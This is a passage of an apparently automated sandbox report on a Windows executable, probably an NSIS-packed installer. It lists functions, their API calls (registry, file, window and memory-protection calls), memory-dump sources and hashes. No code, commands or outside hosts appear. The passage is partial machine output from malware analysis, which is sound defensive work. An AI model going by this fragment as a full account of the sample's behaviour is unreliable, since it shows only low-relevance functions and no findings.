                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                          • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                          Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                          • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                          Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: EnumErrorLastWindows
                                                          • String ID:
                                                          • API String ID: 14984897-0
                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                          Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk172E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                          • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                          • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                          Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                          • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                          Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                          • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                          • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                          • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                          Function 00405BB4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                          Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                          • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                          Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                          Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                          • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                          Function 00405C37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                          Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                          Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                          Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
